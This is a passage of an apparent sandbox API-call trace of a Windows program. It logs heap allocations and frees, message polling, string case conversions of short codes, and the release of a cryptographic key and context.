| out: lpMsg=0x8bf3a8) returned 0 [0262.441] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.441] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.441] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.441] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.441] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.442] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0262.442] CryptDestroyKey (hKey=0xaa59a0) returned 1 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.442] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.443] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.443] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.443] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.443] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.443] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.443] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.443] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.443] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.444] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.444] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.444] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.444] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0262.444] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.444] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.445] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.445] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.445] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.445] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.445] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.445] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.446] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.446] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.446] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.446] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.447] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.447] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.447] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.447] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.447] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.447] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.447] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.447] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.447] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.448] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.449] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.450] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.450] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.450] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.450] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0262.450] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.451] FreeLibrary (hLibModule=0x74d40000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.451] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.451] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.451] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.452] CloseHandle (hObject=0x294) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: 